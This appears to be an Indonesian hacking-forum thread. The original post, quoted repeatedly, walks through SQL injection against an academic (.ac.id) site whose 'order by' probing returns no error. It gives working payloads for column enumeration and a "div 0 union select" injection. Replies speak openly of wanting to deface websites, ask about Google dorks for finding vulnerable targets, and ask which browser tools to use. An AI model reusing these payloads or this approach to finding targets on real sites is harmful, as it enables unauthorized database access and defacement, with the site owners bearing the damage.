SQL Injection 'order by 10000' and still not error?

**bl4ckrayyah** · 12-05-2014, 11:18 PM

(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin

jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

**wine trochanter** · 12-05-2014, 11:40 PM

(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

waduuh kalo jawab kayak gini bingung
ane jg g tau gunain dork yg bagus gmna
ane mah main feeling aja Big Grin

**bl4ckrayyah** · 12-06-2014, 12:04 AM

(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

(12-05-2014, 11:40 PM)wine trochanter Wrote:
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

waduuh kalo jawab kayak gini bingung
ane jg g tau gunain dork yg bagus gmna
ane mah main feeling aja

sebenernya bingung soalnya gimana caranya dapet itu website dengan informasi begitu di linknya hehe

**Kresna** · 12-06-2014, 11:30 AM

(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

yaa sebenernya klo udh paham sqli sih gak perlu make dork juga bisa, seperti yg om wine bilang main Feeling aja :v

**bl4ckrayyah** · 12-07-2014, 08:50 AM

(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

(12-06-2014, 11:30 AM)Kresna Wrote:
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2

Spoiler! :

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya

Spoiler! :

wew pas di kecilin muncul lagi tulisan nya

Spoiler! :

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -

Spoiler! :

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

yaa sebenernya klo udh paham sqli sih gak perlu make dork juga bisa, seperti yg om wine bilang main Feeling aja :v

hmm oke oke om ane coba nanti hehe

**teh manis** · 01-07-2016, 03:44 AM

nambah ilmu lagi dah Big Grin

mkasih info nya

**bybit** · 03-17-2016, 09:53 PM

maksudnya query "div 0" apaan bro ?

mohon pencerahannya sobat Big Grin

**ugly_clown** · 05-27-2016, 10:30 AM

sekarang udah jarang ya bro website ada yg vuln sql injection

**botaksaja** · 05-27-2016, 03:08 PM

(12-05-2014, 09:12 PM)Kresna Wrote: nice share om , cek kulkas

om itu mozila nya pake extension apa? ane mau belajar

**dharmatkj** · 06-04-2016, 09:23 PM

Apa nama tools yang ada di mozilla itu kak masih awam ni Big Grin